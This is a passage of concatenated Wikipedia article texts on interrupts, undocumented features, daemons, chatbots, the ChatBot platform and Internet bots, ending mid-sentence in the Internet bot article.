occur at the device's central processor unit (CPU), if it has one. Doorbell interrupts can be compared toMessage Signaled Interrupts, as they have some similarities. Inmultiprocessorsystems, a processor may send an interrupt request to another processor viainter-processor interrupts[h](IPI). Interrupts provide low overhead and goodlatencyat low load, but degrade significantly at high interrupt rate unless care is taken to prevent several pathologies. The phenomenon where the overall system performance is severely hindered by excessive amounts of processing time spent handling interrupts is called aninterrupt storm. There are various forms oflivelocks, when the system spends all of its time processing interrupts to the exclusion of other required tasks. Under extreme conditions, a large number of interrupts (like very high network traffic) may completely stall the system. To avoid such problems, anoperating systemmust schedule network interrupt handling as carefully as it schedules process execution.[24] With multi-core processors, additional performance improvements in interrupt handling can be achieved throughreceive-side scaling(RSS) whenmultiqueue NICsare used. Such NICs provide multiple receivequeuesassociated to separate interrupts; by routing each of those interrupts to different cores, processing of the interrupt requests triggered by the network traffic received by a single NIC can be distributed among multiple cores. Distribution of the interrupts among cores can be performed automatically by the operating system, or the routing of interrupts (usually referred to asIRQ affinity) can be manually configured.[25][26] A purely software-based implementation of the receiving traffic distribution, known asreceive packet steering(RPS), distributes received traffic among cores later in the data path, as part of theinterrupt handlerfunctionality. Advantages of RPS over RSS include no requirements for specific hardware, more advanced traffic distribution filters, and reduced rate of interrupts produced by a NIC. As a downside, RPS increases the rate ofinter-processor interrupts(IPIs).Receive flow steering(RFS) takes the software-based approach further by accounting forapplication locality; further performance improvements are achieved by processing interrupt requests by the same cores on which particular network packets will be consumed by the targeted application.[25][27][28] Interrupts are commonly used to service hardware timers, transfer data to and from storage (e.g., disk I/O) and communication interfaces (e.g.,UART,Ethernet), handle keyboard and mouse events, and to respond to any other time-sensitive events as required by the application system. Non-maskable interrupts are typically used to respond to high-priority requests such as watchdog timer timeouts, power-down signals andtraps. Hardware timers are often used to generate periodic interrupts. In some applications, such interrupts are counted by the interrupt handler to keep track of absolute or elapsed time, or used by the OS taskschedulerto manage execution of runningprocesses, or both. Periodic interrupts are also commonly used to invoke sampling from input devices such asanalog-to-digital converters,incremental encoder interfaces, andGPIOinputs, and to program output devices such asdigital-to-analog converters,motor controllers, and GPIO outputs. A disk interrupt signals the completion of a data transfer from or to the disk peripheral; this may cause a process to run which is waiting to read or write. A power-off interrupt predicts imminent loss of power, allowing the computer to perform an orderly shut-down while there still remains enough power to do so. Keyboard interrupts typically causekeystrokesto be buffered so as to implementtypeahead. Interrupts are sometimes used to emulate instructions which are unimplemented on some computers in a product family.[29][30]For examplefloating pointinstructions may be implemented in hardware on some systems and emulated on lower-cost systems. In the latter case, execution of an unimplemented floating point instruction will cause an "illegal instruction" exception interrupt. The interrupt handler will implement the floating point function in software and then return to the interrupted program as if the hardware-implemented instruction had been executed.[31]This provides application software portability across the entire line. Interrupts are similar tosignals, the difference being that signals are used forinter-process communication(IPC), mediated by the kernel (possibly via system calls) and handled by processes, while interrupts are mediated by the processor and handled by thekernel. The kernel may pass an interrupt as a signal to the process that caused it (typical examples areSIGSEGV,SIGBUS,SIGILLandSIGFPE).
https://en.wikipedia.org/wiki/Trap_(computing)
Anundocumented featureis an unintended or undocumented hardware operation, for example anundocumented instruction, orsoftware featurefound incomputer hardwareandsoftwarethat is considered beneficial or useful. Sometimes thedocumentationis omitted through oversight, but undocumented features are sometimes not intended for use byend users, but left available for use by the vendor forsoftware supportand development. Also, some unintended operation of hardware or software that ends up being of utility to users is simply abug, flaw or quirk. Since the suppliers of the software usually consider thesoftware documentationto constitute a contract for the behavior of the software, undocumented features are generally left unsupported and may be removed or changed at will and without notice to the users. Undocumented or unsupported features are sometimes also called "not manufacturer supported" (NOMAS), a term coined byPPC Journalin the early 1980s.[1][2][3][4]Some user-reported defects are viewed bysoftware developersas working as expected, leading to the catchphrase "it's not a bug, it's a feature" (INABIAF) and its variations.[5] Undocumented instructions, known asillegal opcodes, on theMOS Technology 6502and its variants are sometimes used by programmers. These were removed in theWDC 65C02. Video gameanddemosceneprogrammers have taken advantage of the unintended operation of computers' hardware to produce new effects or optimizations.[citation needed] In 2019, researchers discovered that a manufacturer debugging mode, known as VISA, had an undocumented feature onIntelPlatform Controller Hubs(PCHs), chipsets included on most Intel-based motherboards, which makes the mode accessible with a normal motherboard.[6]Since the chipset hasdirect memory accessthis is problematic for security reasons. Undocumented features (for example, the ability to change theswitchcharacter inMS-DOS, usually to ahyphen) can be included forcompatibilitypurposes (in this case withUnixutilities) or for future-expansion reasons. However; if the software provider changes their software strategy to better align with the business, the absence of documentation makes it easier to justify the feature's removal. New versions of software might omit mention of old (possibly superseded) features in documentation but keep them implemented for users who've grown accustomed to them.[7] In some cases,software bugsare referred to by developers either jokingly or conveniently as undocumented features.[5][8]This usage may have been popularised in some of Microsoft's responses to bug reports for its firstWord for Windowsproduct,[9]but does not originate there. The oldest surviving reference onUsenetdates to 5 March 1984.[10]Between 1969 and 1972, Sandy Mathes, a systems programmer forPDP-8software atDigital Equipment Corporation(DEC) in Maynard, MA, used the terms "bug" and "feature" in her reporting of test results to distinguish between undocumented actions of delivered software products that wereunacceptableandtolerable, respectively. This usage may have been perpetuated.[11] Undocumented features themselves have become a major feature ofcomputer games. Developers often include variouscheatsand other special features ("easter eggs") that are not explained in the packaged material, but have become part of the "buzz" about the game on theInternetand among gamers. The undocumented features of foreign games are often elements that were notlocalizedfrom their native language. Closed sourceAPIscan also have undocumented functions that are not generally known. These are sometimes used to gain a commercial advantage over third-party software by providing additional information or better performance to the application provider.
https://en.wikipedia.org/wiki/Undocumented_feature
Thisglossary of computer hardware termsis a list of definitions of terms and concepts related tocomputer hardware, i.e. the physical and structural components of computers, architectural issues, and peripheral devices. Alsochip set. Alsochassis,cabinet,box,tower,enclosure,housing,system unit, or simplycase. Also simplyPCI. AlsoDigital Versatile Disc. Alsochip. AlsoLAN cardornetwork card. Alsosolid-state diskorelectronic disk. Alsoaudio card. AlsoSerial AT Attachment. Alsotrackpad. Alsographics card.
https://en.wikipedia.org/wiki/Glossary_of_computer_terms
Inmultitaskingcomputeroperating systems, adaemon(/ˈdiːmən/or/ˈdeɪmən/)[1]is acomputer programthat runs as abackground process, rather than being under the direct control of an interactive user. Traditionally, the process names of a daemon end with the letterd, for clarification that the process is in fact a daemon, and for differentiation between a daemon and a normal computer program. For example,syslogdis a daemon that implements system logging facility, andsshdis a daemon that serves incomingSSHconnections. In aUnixenvironment, theparent processof a daemon is often, but not always, theinitprocess. A daemon is usually created either by a processforkinga child process and then immediately exiting, thus causing init to adopt the child process, or by the init process directly launching the daemon. In addition, a daemon launched by forking and exiting typically must perform other operations, such as dissociating the process from any controllingterminal(tty). Such procedures are often implemented in various convenience routines such asdaemon(3)in Unix. Systems often start daemons atboottime that will respond to network requests, hardware activity, or other programs by performing some task. Daemons such ascronmay also perform defined tasks at scheduled times. The term was coined by the programmers atMIT's Project MAC. According toFernando J. Corbató, who worked onProject MACaround 1963, his team was the first to use the term daemon, inspired byMaxwell's demon, an imaginary agent in physics andthermodynamicsthat helped to sort molecules, stating, "We fancifully began to use the word daemon to describe background processes that worked tirelessly to perform system chores".[2]Unixsystems inherited this terminology. Maxwell's demon is consistent with Greek mythology's interpretation of adaemonas a supernatural being working in the background. In the general sense, daemon is an older form of the word "demon", from theGreekδαίμων. In theUnix System Administration HandbookEvi Nemethstates the following about daemons:[3] Many people equate the word "daemon" with the word "demon", implying some kind ofsatanicconnection between UNIX and theunderworld. This is an egregious misunderstanding. "Daemon" is actually a much older form of "demon"; daemons have no particular bias towards good or evil, but rather serve to help define a person's character or personality. Theancient Greeks' concept of a "personal daemon" was similar to the modern concept of a "guardian angel"—eudaemoniais the state of being helped or protected by a kindly spirit. As a rule, UNIX systems seem to be infested with both daemons and demons. In modern usage in the context of computer software, the worddaemonis pronounced/ˈdiːmən/DEE-mənor/ˈdeɪmən/DAY-mən.[1] Alternative terms fordaemonareservice(used in Windows, from Windows NT onwards, and later also in Linux),started task(IBMz/OS),[4]andghost job(XDSUTS). Sometimes the more general termserverorserver processis used, particularly for daemons that operate as part ofclient-server systems.[5] After the term was adopted for computer use, it was rationalized as abackronymfor Disk And Execution MONitor.[6][1] Daemons that connect to a computer network are examples ofnetwork services. In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned theinitprocess (process number 1) as its parent process and has no controlling terminal. However, more generally, a daemon may be any background process, whether a child of the init process or not. On a Unix-like system, the common method for a process to become a daemon, when the process is started from thecommand lineor from a startup script such as aninitscript or aSystemStarterscript, involves: If the process is started by asuper-serverdaemon, such asinetd,launchd, orsystemd, the super-server daemon will perform those functions for the process,[7][8][9]except for old-style daemons not converted to run undersystemdand specified asType=forking[9]and "multi-threaded" datagram servers underinetd.[7] In theMicrosoft DOSenvironment, daemon-like programs were implemented asterminate-and-stay-resident programs(TSR). OnMicrosoft Windows NTsystems, programs calledWindows servicesperform the functions of daemons. They run as processes, usually do not interact with the monitor, keyboard, and mouse, and may be launched by the operating system at boot time. InWindows 2000and later versions, Windows services are configured and manually started and stopped using theControl Panel, a dedicated control/configuration program, the Service Controller component of theService Control Manager(sccommand), thenet startandnet stopcommands or thePowerShellscripting system. However, any Windows application can perform the role of a daemon, not just a service, and some Windows daemons have the option of running as a normal process. On theclassic Mac OS, optional features and services were provided by files loaded at startup time that patched the operating system; these were known assystem extensionsandcontrol panels. Later versions of classic Mac OS augmented these with fully fledgedfaceless background applications: regular applications that ran in the background. To the user, these were still described as regular system extensions. macOS, which is aUnixsystem, uses daemons but uses the term "services" to designate software that performs functions selected from theServices menu, rather than using that term for daemons, as Windows does.
https://en.wikipedia.org/wiki/Daemon_(computer_software)
Achatbot(originallychatterbot)[1]is asoftwareapplication or web interface designed to have textual or spoken conversations.[2][3][4]Modern chatbots are typicallyonlineand usegenerative artificial intelligencesystems that are capable of maintaining a conversation with a user innatural languageand simulating the way a human would behave as a conversational partner. Such chatbots often usedeep learningandnatural language processing, but simpler chatbots have existed for decades. Although chatbots have existed since the late 1960s, the fieldgained widespread attention in the early 2020sdue to the popularity ofOpenAI'sChatGPT,[5][6]followed by alternatives such asMicrosoft'sCopilot,DeepSeekandGoogle'sGemini.[7]Such examples reflect the recent practice of basing such products upon broadfoundationallarge language models, such asGPT-4or theGemini language model, that getfine-tunedso as to target specific tasks or applications (i.e., simulating human conversation, in the case of chatbots). Chatbots can also be designed or customized to further target even more specific situations and/or particular subject-matter domains.[8] A major area where chatbots have long been used is incustomer serviceandsupport, with various sorts ofvirtual assistants.[9]Companies spanning a wide range of industries have begun using the latestgenerative artificial intelligencetechnologies to power more advanced developments in such areas.[8] In 1950,Alan Turing's famous article "Computing Machinery and Intelligence" was published,[10]which proposed what is now called theTuring testas a criterion ofintelligence. This criterion depends on the ability of acomputer programto impersonate a human in areal-timewritten conversation with a human judge to the extent that the judge is unable to distinguish reliably—on the basis of the conversational content alone—between the program and a real human. The notoriety of Turing's proposed test stimulated great interest inJoseph Weizenbaum's programELIZA, published in 1966, which seemed to be able to fool users into believing that they were conversing with a real human. However Weizenbaum himself did not claim that ELIZA was genuinely intelligent, and the introduction to his paper presented it more as a debunking exercise: In artificial intelligence, machines are made to behave in wondrous ways, often sufficient to dazzle even the most experienced observer. But once a particular program is unmasked, once its inner workings are explained, its magic crumbles away; it stands revealed as a mere collection of procedures. The observer says to himself "I could have written that". With that thought, he moves the program in question from the shelf marked "intelligent", to that reserved for curios. The object of this paper is to cause just such a re-evaluation of the program about to be "explained". Few programs ever needed it more.[11] ELIZA's key method of operation involves the recognition of clue words or phrases in the input, and the output of the corresponding pre-prepared or pre-programmed responses that can move the conversation forward in an apparently meaningful way (e.g. by responding to any input that contains the word 'MOTHER' with 'TELL ME MORE ABOUT YOUR FAMILY').[11]Thus an illusion of understanding is generated, even though the processing involved has been merely superficial. ELIZA showed that such an illusion is surprisingly easy to generate because human judges are ready to give the benefit of the doubt when conversational responses arecapable of being interpretedas "intelligent". Interface designers have come to appreciate that humans' readiness to interpret computer output as genuinely conversational—even when it is actually based on rather simple pattern-matching—can be exploited for useful purposes. Most people prefer to engage with programs that are human-like, and this gives chatbot-style techniques a potentially useful role in interactive systems that need to elicit information from users, as long as that information is relatively straightforward and falls into predictable categories. Thus, for example, online help systems can usefully employ chatbot techniques to identify the area of help that users require, potentially providing a "friendlier" interface than a more formal search or menu system. This sort of usage holds the prospect of moving chatbot technology from Weizenbaum's "shelf ... reserved for curios" to that marked "genuinely useful computational methods". Among the most notable early chatbots are ELIZA (1966) andPARRY(1972).[12][13][14][15]More recent notable programs includeA.L.I.C.E.,Jabberwackyand D.U.D.E (Agence Nationale de la RechercheandCNRS2006). While ELIZA and PARRY were used exclusively to simulate typed conversation, many chatbots now include other functional features, such as games andweb searchingabilities. In 1984, a book calledThe Policeman's Beard is Half Constructedwas published, allegedly written by the chatbotRacter(though the program as released would not have been capable of doing so).[16] From 1978[17]to some time after 1983,[18]the CYRUS project led byJanet Kolodnerconstructed a chatbot simulatingCyrus Vance(57thUnited States Secretary of State). It usedcase-based reasoning, and updated its database daily by parsing wire news fromUnited Press International. The program was unable to process the news items subsequent to the surprise resignation of Cyrus Vance in April 1980, and the team constructed another chatbot simulating his successor,Edmund Muskie.[19][18] One pertinent field of AI research isnatural-language processing. Usually,weak AIfields employ specialized software or programming languages created specifically for the narrow function required. For example, A.L.I.C.E. uses amarkup languagecalled AIML,[3]which is specific to its function as aconversational agent, and has since been adopted by various other developers of, so-called,Alicebots. Nevertheless, A.L.I.C.E. is still purely based onpattern matchingtechniques without any reasoning capabilities, the same technique ELIZA was using back in 1966. This is not strong AI, which would requiresapienceandlogical reasoningabilities. Jabberwacky learns new responses and context based onreal-timeuser interactions, rather than being driven from a staticdatabase. Some more recent chatbots also combine real-time learning withevolutionary algorithmsthat optimize their ability to communicate based on each conversation held. Chatbot competitions focus on the Turing test or more specific goals. Two such annual contests are theLoebner Prizeand The Chatterbox Challenge (the latter has been offline since 2015, however, materials can still be found from web archives).[20] DBpediacreated a chatbot during theGSoCof 2017.[21]It can communicate throughFacebook Messenger. Modern chatbots likeChatGPTare often based onlarge language modelscalledgenerative pre-trained transformers(GPT). They are based on adeep learningarchitecture called thetransformer, which containsartificial neural networks. They learn how to generate text by being trained on a largetext corpus, which provides a solid foundation for the model to perform well on downstream tasks with limited amounts of task-specific data. Despite criticism of its accuracy and tendency to "hallucinate"—that is, to confidently output false information and even cite non-existent sources—ChatGPT has gained attention for its detailed responses and historical knowledge. Another example is BioGPT, developed byMicrosoft, which focuses on answeringbiomedicalquestions.[22][23]In November 2023, Amazon announced a new chatbot, called Q, for people to use at work.[24] Many companies' chatbots run onmessaging appsor simply viaSMS. They are used forB2Ccustomer service, sales and marketing.[25] In 2016, Facebook Messenger allowed developers to place chatbots on their platform. There were 30,000 bots created for Messenger in the first six months, rising to 100,000 by September 2017.[26] Since September 2017, this has also been as part of a pilot program on WhatsApp. AirlinesKLMandAeroméxicoboth announced their participation in the testing;[27][28][29][30]both airlines had previously launched customer services on the Facebook Messenger platform. The bots usually appear as one of the user's contacts, but can sometimes act as participants in agroup chat. Many banks, insurers, media companies, e-commerce companies, airlines, hotel chains, retailers, health care providers, government entities, and restaurant chains have used chatbots toanswer simple questions, increasecustomer engagement,[31]for promotion, and to offer additional ways to order from them.[32]Chatbots are also used inmarket researchto collect short survey responses.[33] A 2017 study showed 4% of companies used chatbots.[34]In a 2016 study, 80% of businesses said they intended to have one by 2020.[35] Previous generations of chatbots were present on company websites, e.g. Ask Jenn fromAlaska Airlineswhich debuted in 2008[36]orExpedia's virtual customer service agent which launched in 2011.[36][37]The newer generation of chatbots includesIBM Watson-powered "Rocky", introduced in February 2017 by the New York City-basede-commercecompany Rare Carat to provide information to prospective diamond buyers.[38][39] Used by marketers to script sequences of messages, very similar to anautorespondersequence. Such sequences can be triggered by user opt-in or the use of keywords within user interactions. After a trigger occurs a sequence of messages is delivered until the next anticipated user response. Each user response is used in the decision tree to help the chatbot navigate the response sequences to deliver the correct response message. Companies have used chatbots for customer support, human resources, or inInternet-of-Things(IoT) projects.Overstock.com, for one, has reportedly launched a chatbot named Mila to attempt to automate certain processes when customer service employees request sick leave.[40]Other large companies such asLloyds Banking Group,Royal Bank of Scotland,RenaultandCitroënare now using chatbots instead ofcall centreswith humans to provide a first point of contact.[citation needed]In large companies, like in hospitals and aviation organizations, chatbots are also used to share information within organizations, and to assist and replace service desks.[citation needed] Chatbots have been proposed as a replacement forcustomer servicedepartments.[41] Deep learningtechniques can be incorporated into chatbot applications to allow them to map conversations between users and customer service agents, especially in social media.[42] In 2019,Gartnerpredicted that by 2021, 15% of all customer service interactions globally will be handled completely by AI.[43]A study byJuniper Researchin 2019 estimates retail sales resulting from chatbot-based interactions will reach $112 billion by 2023.[44] In 2016, Russia-based Tochka Bank launched a chatbot onFacebookfor a range of financial services, including a possibility of making payments.[45]In July 2016,Barclays Africaalso launched a Facebook chatbot.[46] In 2023, US-basedNational Eating Disorders Associationreplaced its humanhelplinestaff with a chatbot but had to take it offline after users reported receiving harmful advice from it.[47][48][49] Chatbots are also appearing in the healthcare industry.[50][51]A study suggested that physicians in the United States believed that chatbots would be most beneficial for scheduling doctor appointments, locating health clinics, or providing medication information.[52] ChatGPTis able to answer user queries related to health promotion and disease prevention such as screening andvaccination.[53]WhatsApphas teamed up with theWorld Health Organization(WHO) to make a chatbot service that answers users' questions onCOVID-19.[54] In 2020, theGovernment of Indialaunched a chatbot called MyGov Corona Helpdesk,[55]that worked through WhatsApp and helped people access information about the Coronavirus (COVID-19) pandemic.[56][57] Certain patient groups are still reluctant to use chatbots. A mixed-methods 2019 study showed that people are still hesitant to use chatbots for their healthcare due to poor understanding of the technological complexity, the lack of empathy, and concerns about cyber-security. The analysis showed that while 6% had heard of a health chatbot and 3% had experience of using it, 67% perceived themselves as likely to use one within 12 months. The majority of participants would use a health chatbot for seeking general health information (78%), booking a medical appointment (78%), and looking for local health services (80%). However, a health chatbot was perceived as less suitable for seeking results of medical tests and seeking specialist advice such as sexual health.[58] The analysis of attitudinal variables showed that most participants reported their preference for discussing their health with doctors (73%) and having access to reliable and accurate health information (93%). While 80% were curious about new technologies that could improve their health, 66% reported only seeking a doctor when experiencing a health problem and 65% thought that a chatbot was a good idea. 30% reported dislike about talking to computers, 41% felt it would be strange to discuss health matters with a chatbot and about half were unsure if they could trust the advice given by a chatbot. Therefore, perceived trustworthiness, individual attitudes towards bots, and dislike for talking to computers are the main barriers to health chatbots.[58][53] In New Zealand, the chatbot SAM – short forSemantic Analysis Machine[59]– has been developed by Nick Gerritsen of Touchtech.[60]It is designed to share its political thoughts, for example on topics such as climate change, healthcare and education, etc. It talks to people through Facebook Messenger.[61][62][63][64] In 2022, the chatbot "Leader Lars" or "Leder Lars" was nominated forThe Synthetic Partyto run in theDanishparliamentary election,[65]and was built by the artist collective Computer Lars.[66]Leader Lars differed from earlier virtual politicians by leading apolitical partyand by not pretending to be an objective candidate.[67]This chatbot engaged in critical discussions on politics with users from around the world.[68] InIndia, the state government has launched a chatbot for its Aaple Sarkar platform,[69]which provides conversational access to information regarding public services managed.[70][71] Chatbots have also been incorporated into devices not primarily meant for computing, such as toys.[72] HelloBarbieis an Internet-connected version of the doll that uses a chatbot provided by the company ToyTalk,[73]which previously used the chatbot for a range of smartphone-based characters for children.[74]These characters' behaviors are constrained by a set of rules that in effect emulate a particular character and produce a storyline.[75] TheMy Friend Cayladoll was marketed as a line of 18-inch (46 cm) dolls which usesspeech recognitiontechnology in conjunction with anAndroidoriOSmobile app to recognize the child's speech and have a conversation. Like the Hello Barbie doll, it attracted controversy due to vulnerabilities with the doll'sBluetoothstack and its use of data collected from the child's speech. IBM'sWatson computerhas been used as the basis for chatbot-based educational toys for companies such asCogniToys,[72]intended to interact with children for educational purposes.[76] Malicious chatbots are frequently used to fillchat roomswith spam and advertisements by mimicking human behavior and conversations or to entice people into revealing personal information, such as bank account numbers. They were commonly found onYahoo! Messenger,Windows Live Messenger,AOL Instant Messengerand otherinstant messagingprotocols. There has also been a published report of a chatbot used in a fake personal ad on a dating service's website.[77] Tay, an AI chatbot designed to learn from previous interaction, caused major controversy due to it being targeted by internet trolls on Twitter. Soon after its launch, the bot was exploited, and with its "repeat after me" capability, it started releasing racist, sexist, and controversial responses to Twitter users.[78]This suggests that although the bot learned effectively from experience, adequate protection was not put in place to prevent misuse.[79] If a text-sendingalgorithmcan pass itself off as a human instead of a chatbot, its message would be more credible. Therefore, human-seeming chatbots with well-crafted online identities could start scattering fake news that seems plausible, for instance making false claims during an election. With enough chatbots, it might be even possible to achieve artificialsocial proof.[80][81] Data securityis one of the major concerns of chatbot technologies. Security threats and system vulnerabilities are weaknesses that are often exploited by malicious users. Storage of user data and past communication, that is highly valuable for training and development of chatbots, can also give rise to security threats.[82]Chatbots operating on third-party networks may be subject to various security issues if owners of the third-party applications have policies regarding user data that differ from those of the chatbot.[82]Security threats can be reduced or prevented by incorporating protective mechanisms. Userauthentication, chatEnd-to-end encryption, and self-destructing messages are some effective solutions to resist potential security threats.[82] Chatbots have shown to be an emerging technology used in the field of mental health. Its usage may encourage the users to seek advice on matters of mental health as a means to avoid the stigmatization that may come from sharing such matters with other people.[83]This is because chatbots can give a sense of privacy and anonymity when sharing sensitive information, as well as providing a space that allows for the user to be free of judgment.[83]An example of this can be seen in a study which found that with social media and AI chatbots both being possible outlets to express mental health online, users were more willing to share their darker and more depressive  emotions to the chatbot.[83] Findings prove that chatbots have great potential in scenarios in which it is difficult for users to reach out to family or friends for support.[83]It has been noted that it demonstrates the ability to give young people "various types of social support such as appraisal, informational, emotional, and instrumental support".[83]Studies have found that chatbots are able to assist users in managing things such as depression and anxiety.[83]Some examples of chatbots that serve this function are "Woebot, Wysa, Vivibot, and Tess".[83] Evidence indicates that when mental health chatbots interact with users, they tend to follow certain conversation flows.[84]These being guided conversation, semi guided conversation, and open ended conversation.[84]The most popular, guided conversation, “only allows the users to communicate with the chatbot with predefined responses from the chatbot. It does not allow any form of open input from the users”.[84]It has also been noted in a study looking at the methods employed by various mental health chatbots, that most of them employed a form of cognitive behavior therapy with the user.[84] Research has identified that there are potential barriers to entry that come with the usage of chatbots for mental health.[85]There exist ongoing privacy concerns with sharing user’s personal data in chat logs with chatbots.[85]In addition to that, there exists a lack of willingness from those in lower socioeconomic statuses to adopt interactions with chatbots as a meaningful way to improve upon mental health.[85]Though chatbots may be capable of detecting simple human emotions in interactions with users, they are incapable of replicating the level of empathy that human therapists do.[85]Due to the nature of chatbots being language learning models trained on numerous datasets, the issue ofAlgorithmic Biasexists.[85]Chatbots with built in biases from their training can have them brought out against individuals of certain backgrounds and may result incorrect information being conveyed.[85] There is a lack of research about how exactly these interactions help with a user’s real life.[84]Additionally, there are concerns regarding the safety of users when interacting with such chatbots.[84]When improvements and advancements are made to such technologies, how that may affect humans is not a priority.[84]It is possible that this can lead to "unintended negative consequences, such as biases, inadequate and failed responses, and privacy issues".[84] A risk that may come about because of the usage of chatbots to deal with mental health is increased isolation, as well as a lack of support in times of crisis.[84]Another notable risk is a general lack of a strong understanding of mental health.[84]Studies have indicated that mental health oriented chatbots have been prone to recommending users medical solutions and to rely upon themselves heavily.[84] Chatbots have difficulty managing non-linear conversations that must go back and forth on a topic with a user.[86] Large language modelsare more versatile, but require a large amount of conversational data to train. These models generate new responses word by word based on user input, are usually trained on a large dataset of natural-language phrases.[3]They sometimes provide plausible-sounding but incorrect or nonsensical answers. They can make up names, dates, historical events, and even simple math problems.[87]When large language models produce coherent-sounding but inaccurate or fabricated content, this is referred to as "hallucinations". When humans use and apply chatbot content contaminated with hallucinations, this results in "botshit".[88]Given the increasing adoption and use of chatbots for generating content, there are concerns that this technology will significantly reduce the cost it takes humans to generatemisinformation.[89] Chatbots and technology in general used to automate repetitive tasks. But advanced chatbots likeChatGPTare also targeting high-paying, creative, and knowledge-based jobs, raising concerns about workforce disruption and quality trade-offs in favor of cost-cutting.[90] Chatbots are increasingly used bysmall and medium enterprises, to handle customer interactions efficiently, reducing reliance on largecall centersand lowering operational costs.[91] Prompt engineering, the task of designing and refining prompts (inputs) leading to desired AI-generated responses has quickly gained significant demand with the advent of large language models,[92]although the viability of this job is questioned due to new techniques for automating prompt engineering.[93] Generative AI uses a high amount ofelectric power. Due to reliance onfossil fuelsin itsgeneration, this increasesair pollution,water pollution, andgreenhouse gas emissions. In 2023, a question toChatGPTconsumed on average 10 times as much energy as a Google search.[94]Data centres in general, and those used for AI tasks specifically, consume significant amounts of water for cooling.[95][96]
https://en.wikipedia.org/wiki/Chatbot
ChatBotis a software platform for creatingchatbotsfor business use released in August 2017.[2] ChatBot (BotEngine) has its origins in a research project created by the companyText(formerly LiveChat Software), which won with this project athackathonin 2016.[3][4][5]In August 2017, LiveChat launched a beta version of the BotEngine chatbots build platform.[6][2][7] In September 2017, LiveChat integrated with BotEngine.[8][9]ChatBot, in its current form, was launched on February 21, 2018.[citation needed]In March 2018, BotEngine was released from itsbeta version.[10]Later that year, the product has been rebranded to ChatBot, following the purchase of thechatbot.comdomain.[11][12][13]In October 2019, ChatBot added a feature to collect customized data about visitors who interacted with bots on websites orFacebook.[14]In May 2020, ChatBot in partnership with Infermedica, launchedCOVID-19Risk Assessment ChatBot.[15] In March 2021, ChatBot launched a new version of Visual Builder.[16] ChatBot is a platform for building automatic chatbots using artificial intelligence.[17][18] ChatBot constructs bots using integration with a range of tools includingFacebook Messenger,LiveChat,Skype,KiK,Slack,TwitterandYouTube.[19][20][21] In 2020, the number of ChatBot clients reached 1,000, including[22]UEFA,Unilever,HTC,Kayak,Danone,Moody's,GM.[23][24]ChatBot supports multiplenon-profit organizations,[25]including:European Mentoring and Coaching Council,[26]Musculoskeletal Australia,[27]Operation Kindness[28]and Tinnitus UK.[29]It is mainly used for connecting and engaging with communities, andfundraising.[30]
https://en.wikipedia.org/wiki/ChatBot
AnInternet bot,web robot,robot, or simplybot,[1]is asoftware applicationthat runs automated tasks (scripts) on theInternet, usually with the intent to imitate human activity, such as messaging, on a large scale.[2]An Internet bot plays theclientrole in aclient–server modelwhereas theserverrole is usually played byweb servers. Internet bots are able to perform simple and repetitive tasks much faster than a person could ever do. The most extensive use of bots is forweb crawling, in which an automated script fetches, analyzes and files information fromwebservers. More than half of all web traffic is generated by bots.[3] Efforts by web servers to restrict bots vary. Some servers have arobots.txtfile that contains the rules governing bot behavior on that server. Any bot that does not follow the rules could, in theory, be denied access to or removed from the affected website. If the posted text file has no associated program/software/app, then adhering to the rules is entirely voluntary. There would be no way to enforce the rules or to ensure that a bot's creator or implementer reads or acknowledges the robots.txt file. Some bots are "good", e.g.search engine spiders, while others are used to launch malicious attacks on political campaigns, for example.[3] Some bots communicate with users of Internet-based services, viainstant messaging(IM),Internet Relay Chat(IRC), or other web interfaces such asFacebook botsandTwitter bots. Thesechatbotsmay allow people to ask questions in plain English and then formulate a response. Such bots can often handle reporting weather,postal codeinformation, sports scores, currency or other unit conversions, etc.[4]Others are used for entertainment, such asSmarterChildonAOL Instant MessengerandMSN Messenger.[citation needed] Additional roles of an IRC bot may be to listen on a conversation channel, and to comment on certain phrases uttered by the participants (based onpattern matching). This is sometimes used as a help service for new users or to censorprofanity.[citation needed] Social bots are sets of algorithms that take on the duties of repetitive sets of instructions in order to establish a service or connection among social networking users. Among the various designs of networking bots, the most common arechat bots, algorithms designed to converse with a human user, and social bots, algorithms designed to mimic human behaviors to converse with patterns similar to those of a human user. The history of social botting can be traced back toAlan Turingin the 1950s and his vision of designing sets of instructional code approved by theTuring test. In the 1960sJoseph WeizenbaumcreatedELIZA, a natural language processing computer program considered an early indicator of artificial intelligence algorithms. ELIZA inspired computer programmers to design tasked programs that can match behavior patterns to their sets of instruction. As a result, natural language processing has become an influencing factor to the development of artificial intelligence and social bots. And as information and thought see a progressive mass spreading on social media websites, innovative technological advancements are made following the same pattern.[citation needed] Reports of political interferences in recent elections, including the 2016 US and 2017 UK general elections,[5]have set the notion of bots being more prevalent because of the ethics that is challenged between the bot's design and the bot's designer.Emilio Ferrara, a computer scientist from the University of Southern California reporting on Communications of the ACM,[6]said the lack of resources available to implementfact-checkingand information verification results in the large volumes of false reports and claims made about these bots on social media platforms. In the case of Twitter, most of these bots are programmed with search filter capabilities that target keywords and phrases favoring political agendas and then retweet them. While the attention of bots is programmed to spread unverified information throughout the social media platforms,[7]it is a challenge that programmers face in the wake of a hostile political climate. The Bot Effect is what Ferrera reported as the socialization of bots and human users creating a vulnerability to the leaking of personal information and polarizing influences outside the ethics of the bot's code, and was confirmed by Guillory Kramer in his study where he observed the behavior of emotionally volatile users and the impact the bots have on them, altering their perception of reality.[citation needed] There has been a great deal of controversy about the use of bots in an automated trading function. Auction websiteeBaytook legal action in an attempt to suppress a third-party company from using bots to look for bargains on its site; this approach backfired on eBay and attracted the attention of further bots. The United Kingdom-basedbet exchange,Betfair, saw such a large amount of traffic coming from bots that it launched a WebService API aimed at bot programmers, through which it can actively manage bot interactions.[citation needed] Bot farms are known to be used in online app stores, like theApple App StoreandGoogle Play, to manipulate positions[8]or increase positive ratings/reviews.[9] A rapidly growing, benign form of internet bot is thechatbot. From 2016, when Facebook Messenger allowed developers to place chatbots on their platform, there has been an exponential growth of their use on that app alone. 30,000 bots were created for Messenger in the first six months, rising to 100,000 by September 2017.[10]Avi Ben Ezra, CTO of SnatchBot, told Forbes that evidence from the use of their chatbot building platform pointed to a near future saving of millions of hours of human labor as 'live chat' on websites was replaced with bots.[11] Companies use internet bots to increase online engagement and streamline communication. Companies often use bots to cut down on cost; instead of employing people to communicate with consumers, companies have developed new ways to be efficient. These chatbots are used to answer customers' questions: for example,Domino'sdeveloped a chatbot that can take orders viaFacebook Messenger. Chatbots allow companies to allocate their employees' time to other tasks.[12] One example of the malicious use of bots is the coordination and operation of anautomated attackon networked computers, such as 